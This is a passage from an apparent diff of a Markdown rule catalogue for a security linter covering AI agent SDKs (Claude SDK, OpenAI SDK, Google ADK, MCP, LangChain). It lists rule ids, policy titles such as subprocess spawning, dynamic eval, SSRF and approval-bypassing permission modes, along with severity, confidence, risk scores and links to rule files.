mcp_tool | Tool body calls eval/exec/compile on dynamic input | high | 0.85 | 59.5 | [mcp/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/code_execution.yaml) | -| 98 | MCP-010 | MCP | tool | 
mcp_tool | Tool body spawns a subprocess | high | 0.70 | 49.0 | [mcp/shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/shell_safety.yaml) | -| 99 | MCP-011 | MCP | tool | mcp_tool | TypeScript MCP tool has no description | low | 0.85 | 12.8 | [mcp/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/tool_definition.yaml) | -| 100 | MCP-012 | MCP | tool | mcp_tool | TypeScript MCP tool spawns a subprocess | high | 0.70 | 49.0 | [mcp/shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/shell_safety.yaml) | -| 101 | MCP-013 | MCP | tool | mcp_tool | TypeScript MCP tool fetches a caller-controlled URL (SSRF) | high | 0.60 | 42.0 | [mcp/ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/ssrf.yaml) | -| 102 | MCP-014 | MCP | tool | mcp_tool | TypeScript MCP tool evaluates dynamic code | high | 0.90 | 63.0 | [mcp/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/code_execution.yaml) | -| 103 | LC-001 | LangChain | tool | langchain_tool | LangChain tool has no description | low | 0.80 | 12.0 | [langchain/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/tool_definition.yaml) | -| 104 | LC-002 | LangChain | tool | langchain_tool | LangChain tool parameters are not type-annotated | medium | 0.85 | 34.0 | [langchain/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/tool_definition.yaml) | -| 105 | LC-003 | LangChain | tool | langchain_tool | LangChain tool body spawns a subprocess | high | 0.85 | 59.5 | [langchain/shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/shell_safety.yaml) | -| 106 | LC-004 | LangChain | tool | langchain_tool | LangChain tool body evaluates dynamic code | high | 0.85 | 59.5 | [langchain/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/code_execution.yaml) | -| 107 | LC-005 | LangChain | tool | 
langchain_tool | LangChain tool fetches a caller-controlled URL (SSRF) | high | 0.80 | 56.0 | [langchain/ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/ssrf.yaml) | -| 108 | LC-006 | LangChain | tool | langchain_tool | LangChain tool returns its output directly, bypassing the model | medium | 0.80 | 32.0 | [langchain/tool_behavior.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/tool_behavior.yaml) | -| 109 | LC-010 | LangChain | tool | langchain_tool | TypeScript LangChain tool has no description | low | 0.80 | 12.0 | [langchain/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/tool_definition.yaml) | -| 110 | LC-011 | LangChain | tool | langchain_tool | TypeScript LangChain tool body spawns a subprocess | high | 0.85 | 59.5 | [langchain/shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/shell_safety.yaml) | -| 111 | LC-012 | LangChain | tool | langchain_tool | TypeScript LangChain tool evaluates dynamic code | high | 0.85 | 59.5 | [langchain/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/code_execution.yaml) | -| 112 | LC-013 | LangChain | tool | langchain_tool | TypeScript LangChain tool fetches a caller-controlled URL (SSRF) | high | 0.80 | 56.0 | [langchain/ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/ssrf.yaml) | -| 113 | LC-014 | LangChain | tool | langchain_tool | TypeScript LangChain tool returns its output directly, bypassing the model | medium | 0.80 | 32.0 | [langchain/tool_behavior.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/tool_behavior.yaml) | -| 114 | LC-101 | LangChain | agent | langchain_agent, langchain_agent_executor | LangChain agent wires a code-execution or shell built-in tool | high | 0.85 | 59.5 | [langchain/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/agent_safety.yaml) | -| 115 | LC-102 | LangChain | 
agent | langchain_agent_executor | LangChain AgentExecutor has no max_iterations limit | medium | 0.80 | 32.0 | [langchain/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/agent_safety.yaml) | -| 116 | LC-111 | LangChain | agent | langchain_agent_executor | TypeScript LangChain AgentExecutor has no maxIterations limit | medium | 0.80 | 32.0 | [langchain/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/agent_safety.yaml) | -| 117 | LC-201 | LangChain | repo | langchain | LangChain project ships no agent-guidance doc (AGENTS.md/CLAUDE.md) | low | 0.90 | 13.5 | [langchain/repo_hygiene.yaml](https://github.com/trustabl/trustabl-rules/blob/main/langchain/repo_hygiene.yaml) | +| | Id | SDK/ADK | Scope | Applies To | Policy | Severity | Confidence | Risk | Source | +| --- | -------- | ----------- | -------- | --------------------------------------------------- | ------------------------------------------------------------------------------------- | -------- | ---------- | ---- | ------------------------------------------------------------------------------------------------------------------------- | +| 1 | CSDK-001 | Claude SDK | tool | claude_sdk_tool | Tool has no description | low | 0.95 | 14.3 | [claude_sdk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/tool_definition.yaml) | +| 2 | CSDK-002 | Claude SDK | tool | claude_sdk_tool | Tool parameters are not type-annotated | medium | 0.90 | 36.0 | [claude_sdk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/tool_definition.yaml) | +| 3 | CSDK-003 | Claude SDK | tool | claude_sdk_tool | Network call has no timeout | high | 0.85 | 59.5 | [claude_sdk/network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/network.yaml) | +| 4 | CSDK-004 | Claude SDK | tool | claude_sdk_tool | Path parameter used in I/O without validation | high | 0.70 | 49.0 | 
[claude_sdk/path_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/path_safety.yaml) | +| 5 | CSDK-005 | Claude SDK | tool | claude_sdk_tool | Tool raises exceptions without a structured error contract | medium | 0.60 | 24.0 | [claude_sdk/error_handling.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/error_handling.yaml) | +| 6 | CSDK-006 | Claude SDK | tool | claude_sdk_tool | Mutating tool has no idempotency key | medium | 0.55 | 22.0 | [claude_sdk/idempotency.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/idempotency.yaml) | +| 7 | CSDK-007 | Claude SDK | tool | claude_sdk_tool | Ambiguous tool name | low | 0.90 | 13.5 | [claude_sdk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/tool_definition.yaml) | +| 8 | CSDK-008 | Claude SDK | tool | claude_sdk_tool | Tool exposes **kwargs without explicit input_schema | medium | 0.80 | 32.0 | [claude_sdk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/tool_definition.yaml) | +| 9 | CSDK-009 | Claude SDK | tool | claude_sdk_tool | Tool fetches a caller-controlled URL (SSRF) | high | 0.60 | 42.0 | [claude_sdk/ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/ssrf.yaml) | +| 10 | CSDK-010 | Claude SDK | tool | claude_sdk_tool | TypeScript Claude SDK tool shells out to the OS | high | 0.70 | 49.0 | [claude_sdk/shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/shell_safety.yaml) | +| 11 | CSDK-011 | Claude SDK | tool | claude_sdk_tool | TypeScript Claude SDK tool evaluates dynamic code | high | 0.90 | 63.0 | [claude_sdk/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/code_execution.yaml) | +| 12 | CSDK-012 | Claude SDK | tool | claude_sdk_tool | TypeScript Claude SDK tool writes to the filesystem | medium | 0.50 | 20.0 | 
[claude_sdk/path_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/path_safety.yaml) | +| 13 | CSDK-013 | Claude SDK | tool | claude_sdk_tool | TypeScript Claude SDK tool fetches a caller-controlled URL (SSRF) | high | 0.60 | 42.0 | [claude_sdk/ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/ssrf.yaml) | +| 14 | CSDK-014 | Claude SDK | tool | claude_sdk_tool | TypeScript Claude SDK tool has no description | low | 0.90 | 13.5 | [claude_sdk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/tool_definition.yaml) | +| 15 | CSDK-016 | Claude SDK | tool | claude_sdk_tool | TypeScript Claude SDK mutating tool has no idempotency key | medium | 0.50 | 20.0 | [claude_sdk/idempotency.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/idempotency.yaml) | +| 16 | CSDK-101 | Claude SDK | agent | claude_agent_definition | Claude subagent is granted the Bash tool | high | 0.80 | 56.0 | [claude_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/agent_safety.yaml) | +| 17 | CSDK-102 | Claude SDK | agent | claude_agent_definition | Claude subagent is granted the WebSearch tool | high | 0.80 | 56.0 | [claude_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/agent_safety.yaml) | +| 18 | CSDK-103 | Claude SDK | agent | claude_agent_definition | AgentDefinition sets permissionMode to bypassPermissions | high | 0.90 | 63.0 | [claude_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/agent_safety.yaml) | +| 19 | CSDK-104 | Claude SDK | agent | claude_agent_definition | Claude subagent is granted filesystem-write built-ins | high | 0.80 | 56.0 | [claude_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/agent_safety.yaml) | +| 20 | CSDK-105 | Claude SDK | agent | claude_agent_definition | Claude subagent is granted the WebFetch tool | high | 
0.75 | 52.5 | [claude_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/agent_safety.yaml) | +| 21 | CSDK-107 | Claude SDK | tool | claude_sdk_tool | Tool body calls eval/exec/compile on dynamic input | high | 0.85 | 59.5 | [claude_sdk/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/code_execution.yaml) | +| 22 | CSDK-108 | Claude SDK | tool | claude_sdk_tool | Tool body spawns a subprocess | high | 0.70 | 49.0 | [claude_sdk/shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/shell_safety.yaml) | +| 23 | CSDK-110 | Claude SDK | subagent | claude_subagent | Subagent granted the built-in Bash tool | high | 0.90 | 63.0 | [claude_sdk/subagent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/subagent_safety.yaml) | +| 24 | CSDK-111 | Claude SDK | subagent | claude_subagent | Subagent granted filesystem-write or web-fetch built-ins | high | 0.85 | 59.5 | [claude_sdk/subagent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/subagent_safety.yaml) | +| 25 | CSDK-120 | Claude SDK | agent | claude_agent_definition | TypeScript AgentDefinition sets permissionMode to bypassPermissions | high | 0.90 | 63.0 | [claude_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/agent_safety.yaml) | +| 26 | CSDK-130 | Claude SDK | agent | claude_query_main | TypeScript query() main agent is granted the Bash tool | high | 0.80 | 56.0 | [claude_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/agent_safety.yaml) | +| 27 | CSDK-131 | Claude SDK | agent | claude_query_main | TypeScript query() main agent is granted filesystem-write or web-fetch built-ins | high | 0.75 | 52.5 | [claude_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/agent_safety.yaml) | +| 28 | CSDK-201 | Claude SDK | repo | claude_sdk | Project default 
permission mode bypasses approvals | high | 0.90 | 63.0 | [claude_sdk/repo.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/repo.yaml) | +| 29 | CSDK-202 | Claude SDK | repo | claude_sdk | Session permission mode bypasses approvals | high | 0.90 | 63.0 | [claude_sdk/repo.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/repo.yaml) | +| 30 | CSDK-203 | Claude SDK | repo | claude_sdk | Repo ships Claude Agent SDK code without an agent-guidance doc (AGENTS.md/CLAUDE.md) | low | 0.90 | 13.5 | [claude_sdk/repo_hygiene.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/repo_hygiene.yaml) | +| 31 | OAI-001 | OpenAI SDK | tool | openai_tool | Tool function has no docstring | low | 0.90 | 13.5 | [openai_sdk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/tool_definition.yaml) | +| 32 | OAI-002 | OpenAI SDK | tool | openai_tool | Tool function has no type-annotated parameters | medium | 0.85 | 34.0 | [openai_sdk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/tool_definition.yaml) | +| 33 | OAI-003 | OpenAI SDK | tool | openai_tool | Tool sets strict_mode=False | medium | 0.95 | 38.0 | [openai_sdk/decorator_config.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/decorator_config.yaml) | +| 34 | OAI-004 | OpenAI SDK | tool | openai_tool | Tool has no failure_error_function | medium | 0.70 | 28.0 | [openai_sdk/decorator_config.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/decorator_config.yaml) | +| 35 | OAI-005 | OpenAI SDK | tool | openai_tool | Network call has no timeout | high | 0.85 | 59.5 | [openai_sdk/network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/network.yaml) | +| 36 | OAI-006 | OpenAI SDK | tool | openai_tool | Tool accepts path without normalization | high | 0.70 | 49.0 | 
[openai_sdk/path_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/path_safety.yaml) | +| 37 | OAI-007 | OpenAI SDK | tool | openai_tool | Ambiguous tool name | low | 0.90 | 13.5 | [openai_sdk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/tool_definition.yaml) | +| 38 | OAI-008 | OpenAI SDK | tool | openai_tool | Tool raises exceptions without a structured error contract | medium | 0.60 | 24.0 | [openai_sdk/error_handling.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/error_handling.yaml) | +| 39 | OAI-009 | OpenAI SDK | tool | openai_tool | Mutating tool has no idempotency key | medium | 0.55 | 22.0 | [openai_sdk/idempotency.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/idempotency.yaml) | +| 40 | OAI-010 | OpenAI SDK | tool | openai_tool | Tool function prints to stdout for diagnostics | low | 0.65 | 9.8 | [openai_sdk/observability.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/observability.yaml) | +| 41 | OAI-011 | OpenAI SDK | tool | openai_tool | urllib network call has no timeout | high | 0.85 | 59.5 | [openai_sdk/network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/network.yaml) | +| 42 | OAI-012 | OpenAI SDK | tool | openai_tool | Tool body spawns a subprocess | high | 0.90 | 63.0 | [openai_sdk/shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/shell_safety.yaml) | +| 43 | OAI-013 | OpenAI SDK | tool | openai_tool | Tool body calls eval/exec/compile on dynamic input | high | 0.90 | 63.0 | [openai_sdk/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/code_execution.yaml) | +| 44 | OAI-014 | OpenAI SDK | tool | openai_tool | Privileged tool has no needs_approval gate | high | 0.70 | 49.0 | [openai_sdk/approvals.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/approvals.yaml) | +| 45 | OAI-015 | OpenAI SDK | tool 
| openai_tool | Tool sets failure_error_function=None | high | 0.85 | 59.5 | [openai_sdk/decorator_config.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/decorator_config.yaml) | +| 46 | OAI-016 | OpenAI SDK | tool | openai_tool | TypeScript tool fetch call has no AbortSignal timeout | high | 0.60 | 42.0 | [openai_sdk/network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/network.yaml) | +| 47 | OAI-017 | OpenAI SDK | tool | openai_tool | TypeScript tool body calls eval / new Function on dynamic input | high | 0.90 | 63.0 | [openai_sdk/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/code_execution.yaml) | +| 48 | OAI-018 | OpenAI SDK | tool | openai_tool | Tool builds outbound URL from non-literal value | medium | 0.55 | 22.0 | [openai_sdk/network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/network.yaml) | +| 49 | OAI-019 | OpenAI SDK | tool | openai_tool | TypeScript mutating tool has no idempotency key | medium | 0.50 | 20.0 | [openai_sdk/idempotency.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/idempotency.yaml) | +| 50 | OAI-022 | OpenAI SDK | tool | openai_tool | TypeScript tool has no description | low | 0.85 | 12.8 | [openai_sdk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/tool_definition.yaml) | +| 51 | OAI-024 | OpenAI SDK | tool | openai_tool | TypeScript tool builds outbound URL from a non-literal value | medium | 0.60 | 24.0 | [openai_sdk/network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/network.yaml) | +| 52 | OAI-101 | OpenAI SDK | agent | openai_agent, openai_sandbox_agent | Agent has no input_guardrails AND wires shell or filesystem-touching tools | high | 0.85 | 59.5 | [openai_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/agent_safety.yaml) | +| 53 | OAI-102 | OpenAI SDK | agent | openai_agent, 
openai_sandbox_agent | Agent uses tool_use_behavior="stop_on_first_tool" | high | 0.95 | 66.5 | [openai_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/agent_safety.yaml) | +| 54 | OAI-103 | OpenAI SDK | agent | openai_agent, openai_sandbox_agent | tool_choice="required" combined with reset_tool_choice=False | high | 0.95 | 66.5 | [openai_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/agent_safety.yaml) | +| 55 | OAI-104 | OpenAI SDK | agent | openai_agent | Raw Agent (not SandboxAgent) wires shell or filesystem-touching tools | medium | 0.75 | 30.0 | [openai_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/agent_safety.yaml) | +| 56 | OAI-105 | OpenAI SDK | agent | openai_agent | TypeScript agent wires a content-fetching hosted tool without inputGuardrails | high | 0.80 | 56.0 | [openai_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/agent_safety.yaml) | +| 57 | OAI-106 | OpenAI SDK | agent | openai_agent, openai_sandbox_agent | Agent wires MCP servers without input_guardrails | high | 0.90 | 63.0 | [openai_sdk/mcp_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/mcp_safety.yaml) | +| 58 | OAI-109 | OpenAI SDK | agent | openai_agent, openai_sandbox_agent | Agent uses WebSearchTool without input_guardrails | high | 0.85 | 59.5 | [openai_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/agent_safety.yaml) | +| 59 | OAI-110 | OpenAI SDK | agent | openai_agent, openai_sandbox_agent | Agent wires a content-fetching tool without output_guardrails | high | 0.60 | 42.0 | [openai_sdk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/agent_safety.yaml) | +| 60 | OAI-111 | OpenAI SDK | agent | openai_agent, openai_sandbox_agent | Agent wires a privileged hosted tool without needs_approval | high | 0.75 | 52.5 | 
[openai_sdk/approvals.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/approvals.yaml) | +| 61 | OAI-201 | OpenAI SDK | repo | openai_agents | Project uses default OpenAI tracing | medium | 0.80 | 32.0 | [openai_sdk/tracing.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/tracing.yaml) | +| 62 | OAI-202 | OpenAI SDK | repo | openai_agents | OpenAI Agents project ships no agent-guidance doc (AGENTS.md/CLAUDE.md) | low | 0.90 | 13.5 | [openai_sdk/repo_hygiene.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/repo_hygiene.yaml) | +| 63 | ADK-001 | Google ADK | tool | adk_function_tool | FunctionTool-wrapped function has no docstring | low | 0.80 | 12.0 | [google_adk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/tool_definition.yaml) | +| 64 | ADK-002 | Google ADK | tool | adk_function_tool | FunctionTool-wrapped function has no type-annotated parameters | medium | 0.85 | 34.0 | [google_adk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/tool_definition.yaml) | +| 65 | ADK-003 | Google ADK | tool | adk_function_tool | Network call has no timeout | high | 0.85 | 59.5 | [google_adk/network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/network.yaml) | +| 66 | ADK-004 | Google ADK | tool | adk_function_tool | Path parameter used in I/O without normalization | high | 0.70 | 49.0 | [google_adk/path_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/path_safety.yaml) | +| 67 | ADK-005 | Google ADK | tool | adk_function_tool | Tool raises exceptions without a structured error contract | medium | 0.60 | 24.0 | [google_adk/error_handling.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/error_handling.yaml) | +| 68 | ADK-006 | Google ADK | tool | adk_function_tool | Mutating tool has no idempotency key | medium | 0.55 | 22.0 | 
[google_adk/idempotency.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/idempotency.yaml) | +| 69 | ADK-007 | Google ADK | tool | adk_function_tool | Ambiguous tool name | low | 0.90 | 13.5 | [google_adk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/tool_definition.yaml) | +| 70 | ADK-008 | Google ADK | agent | adk_llm_agent | Agent grants BashTool with no restrictive command policy | high | 0.75 | 52.5 | [google_adk/builtin_tools.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/builtin_tools.yaml) | +| 71 | ADK-009 | Google ADK | tool | adk_function_tool | FunctionTool body prints to stdout | low | 0.70 | 10.5 | [google_adk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/tool_definition.yaml) | +| 72 | ADK-010 | Google ADK | tool | adk_function_tool | Tool body spawns a subprocess | high | 0.90 | 63.0 | [google_adk/shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/shell_safety.yaml) | +| 73 | ADK-011 | Google ADK | tool | adk_function_tool | Tool body calls eval/exec/compile on dynamic input | high | 0.90 | 63.0 | [google_adk/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/code_execution.yaml) | +| 74 | ADK-012 | Google ADK | tool | adk_function_tool | Tool fetches a caller-controlled URL (SSRF) | high | 0.60 | 42.0 | [google_adk/ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/ssrf.yaml) | +| 75 | ADK-013 | Google ADK | tool | adk_function_tool | TypeScript FunctionTool has no description | low | 0.80 | 12.0 | [google_adk/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/tool_definition.yaml) | +| 76 | ADK-015 | Google ADK | tool | adk_function_tool | TypeScript FunctionTool body evaluates dynamic code | high | 0.90 | 63.0 | 
[google_adk/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/code_execution.yaml) | +| 77 | ADK-016 | Google ADK | tool | adk_function_tool | TypeScript FunctionTool fetches a caller-controlled URL (SSRF) | high | 0.60 | 42.0 | [google_adk/ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/ssrf.yaml) | +| 78 | ADK-101 | Google ADK | agent | adk_llm_agent | LlmAgent has no description | medium | 0.85 | 34.0 | [google_adk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | +| 79 | ADK-102 | Google ADK | agent | adk_llm_agent | Agent with BashTool has no before_tool_callback | high | 0.85 | 59.5 | [google_adk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | +| 80 | ADK-103 | Google ADK | agent | adk_llm_agent | Sub-agent is granted BashTool | high | 0.90 | 63.0 | [google_adk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | +| 81 | ADK-104 | Google ADK | agent | adk_llm_agent | Agent has no safety_settings | medium | 0.75 | 30.0 | [google_adk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | +| 82 | ADK-105 | Google ADK | agent | adk_llm_agent | Agent uses web search built-in without before_tool_callback | high | 0.85 | 59.5 | [google_adk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | +| 83 | ADK-106 | Google ADK | agent | adk_llm_agent | Agent has a code_executor but no before_model_callback | high | 0.80 | 56.0 | [google_adk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | +| 84 | ADK-107 | Google ADK | agent | adk_llm_agent | Agent grants AgentTool but has no before_tool_callback | high | 0.70 | 49.0 | 
[google_adk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | +| 85 | ADK-108 | Google ADK | agent | adk_loop_agent | LoopAgent has no max_iterations | medium | 0.70 | 28.0 | [google_adk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | +| 86 | ADK-109 | Google ADK | agent | adk_llm_agent | TypeScript LlmAgent has no description | medium | 0.85 | 34.0 | [google_adk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | +| 87 | ADK-110 | Google ADK | agent | adk_llm_agent | Agent fetches web content via UrlContextTool/LoadWebPage without before_tool_callback | medium | 0.70 | 28.0 | [google_adk/agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | +| 88 | ADK-201 | Google ADK | repo | google_adk | Google ADK project ships no agent-guidance doc (AGENTS.md/CLAUDE.md) | low | 0.90 | 13.5 | [google_adk/repo_hygiene.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/repo_hygiene.yaml) | +| 89 | MCP-001 | MCP | tool | mcp_tool | Tool has no description | low | 0.90 | 13.5 | [mcp/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/tool_definition.yaml) | +| 90 | MCP-002 | MCP | tool | mcp_tool | Tool has no type-annotated parameters | medium | 0.85 | 34.0 | [mcp/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/tool_definition.yaml) | +| 91 | MCP-003 | MCP | tool | mcp_tool | Ambiguous tool name | low | 0.85 | 12.8 | [mcp/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/tool_definition.yaml) | +| 92 | MCP-004 | MCP | tool | mcp_tool | Network call has no timeout | high | 0.85 | 59.5 | [mcp/network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/network.yaml) | +| 93 | MCP-005 | MCP | tool | mcp_tool | Path parameter used in I/O without validation | 
high | 0.70 | 49.0 | [mcp/path_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/path_safety.yaml) | +| 94 | MCP-006 | MCP | tool | mcp_tool | Tool raises exceptions without a structured error contract | medium | 0.60 | 24.0 | [mcp/error_handling.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/error_handling.yaml) | +| 95 | MCP-007 | MCP | tool | mcp_tool | Mutating tool has no idempotency key | medium | 0.55 | 22.0 | [mcp/idempotency.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/idempotency.yaml) | +| 96 | MCP-008 | MCP | tool | mcp_tool | Tool fetches a caller-controlled URL (SSRF) | high | 0.60 | 42.0 | [mcp/ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/ssrf.yaml) | +| 97 | MCP-009 | MCP | tool | mcp_tool | Tool body calls eval/exec/compile on dynamic input | high | 0.85 | 59.5 | [mcp/code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/code_execution.yaml) | +| 98 | MCP-010 | MCP | tool | mcp_tool | Tool body spawns a subprocess | high | 0.70 | 49.0 | [mcp/shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/shell_safety.yaml) | +| 99 | MCP-011 | MCP | tool | mcp_tool | TypeScript MCP tool has no description | low | 0.85 | 12.8 | [mcp/tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/tool_definition.yaml) | +| 100 | MCP-012 | MCP | tool | mcp_tool | TypeScript MCP tool spawns a subprocess | high | 0.70 | 49.0 | [mcp/shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/shell_safety.yaml) | +| 101 | MCP-013 | MCP | tool | mcp_tool | TypeScript MCP tool fetches a caller-controlled URL (SSRF) | high | 0.60 | 42.0 | [mcp/ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/ssrf.yaml) | +| 102 | MCP-014 | MCP | tool | mcp_tool | TypeScript MCP tool evaluates dynamic code | high | 0.90 | 63.0 | 
